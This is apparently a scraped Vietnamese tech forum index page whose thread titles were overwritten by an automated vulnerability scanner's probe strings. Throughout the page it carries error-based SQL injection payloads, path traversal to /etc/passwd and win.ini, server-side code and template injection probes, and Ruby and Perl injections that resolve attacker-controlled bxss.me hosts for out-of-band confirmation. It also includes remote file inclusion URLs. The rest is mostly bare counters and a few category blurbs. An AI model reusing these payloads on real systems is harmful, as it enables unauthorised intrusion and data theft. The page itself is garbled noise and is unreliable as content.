Tổ chức chung

Bài viết

Phản hồi

0
0
0
1
0
21
0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(100),CHAR(66),CHAR(56),CHAR(120),CHAR(71),CHAR(97),CHAR(90)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

0
0
1

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(100),CHAR(66),CHAR(56),CHAR(120),CHAR(71),CHAR(97),CHAR(90)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

0
0
1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(100)+CHAR(66)+CHAR(56)+CHAR(120)+CHAR(71)+CHAR(97)+CHAR(90)) FROM syscolumns)

0
0
1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(100)+CHAR(66)+CHAR(56)+CHAR(120)+CHAR(71)+CHAR(97)+CHAR(90))

0
0
1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(87),CHAR(70),CHAR(104),CHAR(54),CHAR(70),CHAR(86),CHAR(53),CHAR(89)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

0
0
1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(87),CHAR(70),CHAR(104),CHAR(54),CHAR(70),CHAR(86),CHAR(53),CHAR(89)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

0
0
1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(87)+CHAR(70)+CHAR(104)+CHAR(54)+CHAR(70)+CHAR(86)+CHAR(53)+CHAR(89)) FROM syscolumns)+"

0
0
1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(87)+CHAR(70)+CHAR(104)+CHAR(54)+CHAR(70)+CHAR(86)+CHAR(53)+CHAR(89))+"

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

"+"A".concat(70-3).concat(22*4).concat(104).concat(75).concat(118).concat(76)+(require"socket" Socket.gethostbyname("hithg"+"izhbnegyc462a.bxss.me.")[3].to_s)+"

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

HttP://bxss.me/t/xss.html?%00

0
0
1

1

0
0
1

1

0
0
1

bxss.me/t/xss.html?%00

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1&n974135=v991188

0
0
0
0
1

1

0
0
0
0
0
0
1

1

0
0
0
0
1

1

0
0
1

Oy7u6H1D

0
0
0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

${9999731+10000495}

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
0
0
1

1

0
0
0
0
1

response.write(9040755*9744134)

0
0
1

../../../../../../../../../../etc/passwd

0
0
1

../../../../../../../../../../windows/win.ini

0
0
0
0
1

"+response.write(9040755*9744134)+"

0
0
1

1

0
0
1

1

0
0
)

1

0
0
0
0
1

1

0
0
1

../1

0
0
0
0
1

1

0
0
0
0
0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

Array

0
0
1

1

0
0
1

1

0
0
1

)

0
0
1

1

0
0
1

!(()&&!|*|*|

0
0
0
0
1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

0
0
1

^(#$!@#$)(()))******

0
0
1

1some_inexistent_file_with_long_name%00.jpg

0
0
1

Http://bxss.me/t/fit.txt

0
0
0
0
1

http://bxss.me/t/fit.txt%3F.jpg

0
0
1

bxss.me

0
0
1

1

0
0
1

1

0
0
0
0
0
0
1

1

0
0
1

1

0
0
1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0
0
1

".gethostbyname(lc("hitdk"."oustwwpm0bec7.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(70).chr(114).chr(88)."

0
0
1

1

0
0
1

1

0
0
Hướng dẫn sử dụng diễn đàn

Tổng hợp các hướng dẫn và cách thức sử dụng diễn đàn

5
0

Công nghệ

Bài viết

Phản hồi

1

1

0
0
0
0
0
0
0
0
1

response.write(9708298*9431095)

0
0
All in One PC

Trao đổi thông tin giải pháp máy tính All in One

0
0
0
0
1

1

0
0
0
0
1

"+response.write(9708298*9431095)+"

0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

../../../../../../../../../../etc/passwd

0
0
1

1

0
0
1

../../../../../../../../../../windows/win.ini

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
1

1

0
0
0
0
1

1

0
0
1

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(89),CHAR(105),CHAR(86),CHAR(99),CHAR(100),CHAR(121),CHAR(98)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

0
0
1

Array

0
0
1

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(98),CHAR(89),CHAR(105),CHAR(86),CHAR(99),CHAR(100),CHAR(121),CHAR(98)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

0
0
1

../1

0
0
1

1

0
0
1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(98)+CHAR(89)+CHAR(105)+CHAR(86)+CHAR(99)+CHAR(100)+CHAR(121)+CHAR(98)) FROM syscolumns)

0
0
0
0
1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(98)+CHAR(89)+CHAR(105)+CHAR(86)+CHAR(99)+CHAR(100)+CHAR(121)+CHAR(98))

0
0
1

1

0
0
0
0
1

1

0
0
1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(111),CHAR(78),CHAR(48),CHAR(81),CHAR(74),CHAR(104),CHAR(97),CHAR(109)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

0
0
1

1

0
0
1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(111),CHAR(78),CHAR(48),CHAR(81),CHAR(74),CHAR(104),CHAR(97),CHAR(109)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

0
0
1

".gethostbyname(lc("hitmt"."aobkkirq11d7b.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(69).chr(118).chr(76)."

0
0
1

1

0
0
1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(111)+CHAR(78)+CHAR(48)+CHAR(81)+CHAR(74)+CHAR(104)+CHAR(97)+CHAR(109)) FROM syscolumns)+"

0
0
Atom E3800 Esystech

Trao đổi thông tin, giải pháp máy tính Atom E3800

1
0
Esys-6Ull Kit

Toàn bộ các vấn đề về sys-6ull kit như: tài liệu, hướng dẫn sử dụng, các vấn đề thắc mắc,...

3
0
Linux

Bài viết liên quan để nhúng sử dụng hệ điều hành Linux

1
0